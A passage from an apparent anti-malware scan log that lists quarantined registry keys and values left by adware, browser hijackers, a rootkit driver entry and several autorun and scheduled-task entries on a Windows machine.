    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2F23AB71-4AC6-41F2-A955-EA576E553146}, Quarantined, [247b78fbbae07fb7cb9ffbced9291ee2],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASAPI32, Quarantined, [5a45690a4555da5cf2b326cf6a9902fe],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASMANCS, Quarantined, [871893e0009a3ff7e0c58570c93a7c84],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Doubleing_RASAPI32, Quarantined, [c2dd393a6d2d7abc43e543b66e9557a9],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Doubleing_RASMANCS, Quarantined, [9708ec87702a5bdbde4a14e5e221ed13],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\PCSUSpeedTest_RASAPI32, Quarantined, [3e619fd42773b680fb1cfbc647bcdc24],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\PCSUSpeedTest_RASMANCS, Quarantined, [b2ed175c0e8c89ad080fd0f1867d52ae],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Ronzap_RASAPI32, Quarantined, [811ecca7edadd56168606c89788b1be5],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Ronzap_RASMANCS, Quarantined, [d6c96b0861392c0a3a8eda1b34cf669a],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Doubleing.exe, Quarantined, [dbc4e78c55452a0c9b8e24d5ee15af51],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Ronzap.exe, Quarantined, [346b2f44c8d2ca6c51ae01f4b74ce41c],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, Quarantined, [455a4e256e2c64d2cd2ee90ddc271ee2],
    PUP.Optional.MySearch123, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}, Quarantined, [c4dbcca7f1a931058f55ad2d43c07888],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCH MODULE, Quarantined, [732cfd76f4a6df57629ae1151ae95ca4],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCHPROTECT, Quarantined, [b6e90271ff9bdc5a7c8f5886c63db64a],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}, Quarantined, [b9e6086b7c1e88ae127ab2f6d82be21e],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}, Quarantined, [4857bcb76b2fae88d7b56d3bde2505fb],
    PUP.Optional.SearchModule, HKLM\SOFTWARE\WOW6432NODE\SEARCHMODULE\SMUpd, Quarantined, [fea183f0a9f19e98d2ad298a877c3ec2],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SEARCHPROTECT, Quarantined, [514e561d5c3e1e1827e516c8e51e23dd],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM, Quarantined, [1788c6adc3d7082e29e4f8e64db6c33d],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpf64.sys, Quarantined, [b7e8d89b2575a294f48f6e8e7a89c23e],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\MINIMAL\bsdpr64.sys, Quarantined, [4b54b2c1940655e1a3e28b7109fa5ea2],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpf64.sys, Quarantined, [f9a674ff45551f177215fc0014ef639d],
    Rootkit.Komodia.PUA, HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT\NETWORK\bsdpr64.sys, Quarantined, [742bfa79ebaf22148702dd1f30d317e9],
    PUP.Optional.Shopperz, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\bsdpf64, Quarantined, [e3bc0b6871293afce26e906cbd46916f],
    PUP.Optional.Shopperz, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\bsdpr64, Quarantined, [217e7ff4633749ed143dfb010cf76c94],
    PUP.Optional.ConduitSearchProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CltMngSvc, Quarantined, [4d52165dbdddd561684ff684bd4643bd],
    PUP.Optional.DesktopFind, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\DESKTOP_E, Quarantined, [7b24aec5f5a56acc684eedf161a302fe],
    PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, Quarantined, [bce386ed702ae452e99b94621ae9966a],
    PUP.Optional.ProntSpooler, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\ProntSpooler, Quarantined, [a6f97cf7f5a53ef8db8a2ccc00032bd5],
    PUP.Optional.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FASTCOMPRESS, Quarantined, [148b83f0841636004a59d5e4c53fc739],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SPPD, Quarantined, [67387300b7e3a2945eb18d516a99669a],
    PUP.Optional.InstallCore, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\csastats, Quarantined, [7e214b289cfecd6925692dcd9370e818],
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Tutorials, Quarantined, [b5eae2918e0c1c1a6256e9e1af55a15f],
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\TutoTag, Quarantined, [1986353e2e6ca393d49b11a812f1be42],
    PUP.Optional.Wizzlabs, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\Wizzlabs, Quarantined, [108f30439208fc3a854da65643c0f010],
    PUP.Optional.AppTrailers, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\APPDATALOW\SOFTWARE\AppTrailers, Quarantined, [edb2ec878911da5c301ef1faa95b02fe],
    PUP.Optional.Linkury, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{IELNKSRCH}, Quarantined, [148b7bf87426cf67160723d115ee09f7],
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [57486211e2b820163358a3f957ac7f81],
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}, Quarantined, [cad5ea89a7f37bbb58410cdb28db9b65],
    PUP.Optional.ProductSetup, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\PRODUCTSETUP, Quarantined, [fca3fb78c5d50a2c339502aec83bf60a],
    PUP.Optional.SystemHealer, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\SYSTEM HEALER, Quarantined, [acf39cd7633746f0961837c67b88817f],

    Registry Values: 68
    DDoSTool.Agent, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Pritc, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Quarantined, [e0bf9ed58e0c02343892308c0afac43c]
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\Icatti|installer_name, vbates_csmdcaex-00-gr_.exe, Quarantined, [712ecda69505da5c6641e7129e65a35d]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[fea1373ccad073c3c2ea2c9026de7c84]D1%26b[fea1373ccad073c3c2ea2c9026de7c84]DIE%26cc[fea1373ccad073c3c2ea2c9026de7c84]Dca%26pa[fea1373ccad073c3c2ea2c9026de7c84]DWincy%26cd[fea1373ccad073c3c2ea2c9026de7c84]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[fea1373ccad073c3c2ea2c9026de7c84]D344908437%26a[fea1373ccad073c3c2ea2c9026de7c84]Dwbf_dnldwz_16_37%26os_ver[fea1373ccad073c3c2ea2c9026de7c84]D6.1%26os[fea1373ccad073c3c2ea2c9026de7c84]DWindowsQuarantinedB7QuarantinedBProfessional, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://ca.search.yahoo.com/yhs/sea...003&type=wbf_softdl4u_16_25&param1=1&param2=f[9b043e35c6d42016d59505c41fe3a55b]D4%26b[9b043e35c6d42016d59505c41fe3a55b]DIE%26cc[9b043e35c6d42016d59505c41fe3a55b]Dca%26pa[9b043e35c6d42016d59505c41fe3a55b]DWincy%26cd[9b043e35c6d42016d59505c41fe3a55b]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[9b043e35c6d42016d59505c41fe3a55b]D1235740085%26a[9b043e35c6d42016d59505c41fe3a55b]Dwbf_softdl4u_16_25%26os_ver[9b043e35c6d42016d59505c41fe3a55b]D6.1%26os[9b043e35c6d42016d59505c41fe3a55b]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2f23ab71-4ac6-41f2-a955-ea576e553146}|URL, https://ca.search.yahoo.com/yhs/sea...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[504feb88fd9dbe7844265871c141a55b]D4%26b[504feb88fd9dbe7844265871c141a55b]DIE%26cc[504feb88fd9dbe7844265871c141a55b]Dca%26pa[504feb88fd9dbe7844265871c141a55b]DWincy%26cd[504feb88fd9dbe7844265871c141a55b]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[504feb88fd9dbe7844265871c141a55b]D344908437%26a[504feb88fd9dbe7844265871c141a55b]Dwbf_dnldwz_16_37%26os_ver[504feb88fd9dbe7844265871c141a55b]D6.1%26os[504feb88fd9dbe7844265871c141a55b]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [118ecca7d8c2ca6c6ecb5d5c887b7789]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [623dc9aa82189c9a91a89c1dc043df21]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [d6c94330e0bafe38a0996f4ad0334ab6]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [6e31d59ee0bade5887b2bffa83806898]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_removal_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [faa576fd0f8b89ad89b08f2a897ab947]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_reporter_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [2c730e65faa0ca6c50e94d6c30d3639d]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131187061331560631, Quarantined, [4a5597dc4a50b87e5bdfaa0f31d24db3]
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11B0901B-7817-4D91-9457-0870BE557C0A}|Path, \ttwifi, Delete-on-Reboot, [118e0a69c8d2ec4af7812ecf10f38977]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6}|Path, \SystemHealer Run Delay, Delete-on-Reboot, [2a7580f38317c76f50706e83f50e7f81]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{20CC1331-B6C8-4E07-87C2-17BBB66FF2E6}|Path, \SMW_P, Delete-on-Reboot, [f0afa3d0ff9b66d0ae0f1addcc37dd23]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{33AA5276-F186-4F36-B614-FACEF7D12B73}|Path, \System HealerStartUp, Delete-on-Reboot, [e5ba482beab0ee48358a40b13dc6a957]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4DFEE54D-5A75-4674-9599-2CF0C1235984}|Path, \SystemHealer Monitor, Delete-on-Reboot, [455ae291bddd65d1734d9c55956ead53]
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4F4D22B5-7496-4CF9-9984-12320C3EEE6C}|Path, \nerta, Delete-on-Reboot, [514e3a394753fe382dff2ac55fa57789]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5AECB8E6-6A1D-4416-A94E-63AB73367CB3}|Path, \System HealerPeriod, Delete-on-Reboot, [eeb1dc974c4e0333bd02826f9370c53b]
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9CF158C5-EBBF-4534-947A-C011B643E9A5}|Path, \System Healer Task, Delete-on-Reboot, [029de98acfcb6bcbe6d99e5331d260a0]
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B4C9453B-5317-4006-9B25-BD4D32EE1256}|Path, \bvyvcvd, Delete-on-Reboot, [9f00e390356572c4c20a2ecb3cc77a86]
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBD0F564-06A8-4CFE-8FF2-6C151538BA74}|Path, \PC SpeedUp Service Deactivator, Delete-on-Reboot, [e7b8abc86b2feb4bee8001ee25de12ee]
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F3A5846C-8CA4-4CEF-8D20-35484B32105D}|Path, \Pritc, Delete-on-Reboot, [9c032e457b1f4ee8a0a8b318738f39c7]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe, Quarantined, [dac53b38b5e57bbbaf4c797d5aa91de3]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE|Install, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [aff0472cdbbf0c2aa45737bff60d2dd3]
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IDSCCOMVGX, "C:\Program Files (x86)\EasyHotspot\idsccom_VGX.exe", Quarantined, [b3ecfb78b7e3f541e524748536cdae52]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOM6YE, "C:\Program Files (x86)\mpck\wincom_6YE.exe", Quarantined, [e0bf42317c1eb482cc0ad7f46b97dd23]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOM1YV, "C:\Program Files (x86)\sunnyday\wincom_1YV.exe", Quarantined, [b5ea01723c5eba7c3f97606bf2108d73]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMCF4, "C:\Program Files (x86)\sunnyday\wincom_CF4.exe", Quarantined, [5847cfa4abef989e9a3c3497a55d60a0]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMH7U, "C:\Program Files (x86)\sunnyday\wincom_H7U.exe", Quarantined, [623dc9aacbcf1c1a1bbb874416ec7789]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WINCOMTAO, "C:\Program Files (x86)\sunnyday\wincom_TAO.exe", Quarantined, [fca3680b61398fa7e9edb91201017e82]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\SEARCHMODULE\INFO|Aff, g9izftpbl0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [7c237003ddbdf2440466427e38cb6d93]
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\WOW6432NODE\Icatti|installer_name, vbates_csmdcaex-00-gr_.exe, Quarantined, [f3acdf94a6f4ce68b0f7708908fbf50b]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[f9a66f047129191d604c7f3d51b3b14f]D1%26b[f9a66f047129191d604c7f3d51b3b14f]DIE%26cc[f9a66f047129191d604c7f3d51b3b14f]Dca%26pa[f9a66f047129191d604c7f3d51b3b14f]DWincy%26cd[f9a66f047129191d604c7f3d51b3b14f]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[f9a66f047129191d604c7f3d51b3b14f]D344908437%26a[f9a66f047129191d604c7f3d51b3b14f]Dwbf_dnldwz_16_37%26os_ver[f9a66f047129191d604c7f3d51b3b14f]D6.1%26os[f9a66f047129191d604c7f3d51b3b14f]DWindowsQuarantinedB7QuarantinedBProfessional, %4, %5
    PUP.Optional.SpeedChecker, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|SpeedCheckerService.exe, 11000, Quarantined, [d2cda1d26a304de9e48db52ff21154ac]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DisplayName, Search the web, Quarantined, [dec12e453c5e80b6c8565d9730d348b8]
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [613e175cbfdbe74f06bb7f77c83bde22]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://ca.search.yahoo.com/yhs/sea...003&type=wbf_softdl4u_16_25&param1=1&param2=f[653a40332773bf779cce5c6dec16bf41]D4%26b[653a40332773bf779cce5c6dec16bf41]DIE%26cc[653a40332773bf779cce5c6dec16bf41]Dca%26pa[653a40332773bf779cce5c6dec16bf41]DWincy%26cd[653a40332773bf779cce5c6dec16bf41]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyCtAyEtN1L2XzutAtFtBtAtFtCtFtBtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyDtDtAyCtAtD0FtDtGtDyB0BtDtGyDzy0EzytGyCzytD0BtGyByEtB0AyC0EyByByBtD0DyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[653a40332773bf779cce5c6dec16bf41]D1235740085%26a[653a40332773bf779cce5c6dec16bf41]Dwbf_softdl4u_16_25%26os_ver[653a40332773bf779cce5c6dec16bf41]D6.1%26os[653a40332773bf779cce5c6dec16bf41]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2f23ab71-4ac6-41f2-a955-ea576e553146}|URL, https://ca.search.yahoo.com/yhs/sea...d_003&type=wbf_dnldwz_16_37&param1=1&param2=f[247b78fbbae07fb7cb9ffbced9291ee2]D4%26b[247b78fbbae07fb7cb9ffbced9291ee2]DIE%26cc[247b78fbbae07fb7cb9ffbced9291ee2]Dca%26pa[247b78fbbae07fb7cb9ffbced9291ee2]DWincy%26cd[247b78fbbae07fb7cb9ffbced9291ee2]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26cr[247b78fbbae07fb7cb9ffbced9291ee2]D344908437%26a[247b78fbbae07fb7cb9ffbced9291ee2]Dwbf_dnldwz_16_37%26os_ver[247b78fbbae07fb7cb9ffbced9291ee2]D6.1%26os[247b78fbbae07fb7cb9ffbced9291ee2]DWindowsQuarantinedB7QuarantinedBProfessional&p={searchTerms}, %4, %5
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [fea192e15e3c9b9ba6c0b7155ea446ba]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe, Quarantined, [455a4e256e2c64d2cd2ee90ddc271ee2]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE|Install, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [cbd4f1824654f640cc2fa84ee41f38c8]
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|DiskPower, "C:\Program Files (x86)\DPower\DiskPower.exe", Quarantined, [158aed86b1e9f73fad277850b64eeb15]
    Adware.EoRezo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|sun21, "C:\Program Files (x86)\SunnyDay21\SunnyDay.exe", Quarantined, [9d02155e2773a78f8f742ac900033ec2]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCH MODULE|Publisher, Goobzo, Quarantined, [732cfd76f4a6df57629ae1151ae95ca4]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SEARCHPROTECT|Publisher, Client Connect LTD, Quarantined, [b6e90271ff9bdc5a7c8f5886c63db64a]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}|Publisher, Linkury, Quarantined, [b9e6086b7c1e88ae127ab2f6d82be21e]
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}|Publisher, Linkury, Quarantined, [4857bcb76b2fae88d7b56d3bde2505fb]
    PUP.Optional.Goobzo, HKLM\SOFTWARE\WOW6432NODE\SEARCHMODULE\SMUPD|Scf, (binary data), Quarantined, [bfe0da994d4d7cba4ce34f55ce35857b]
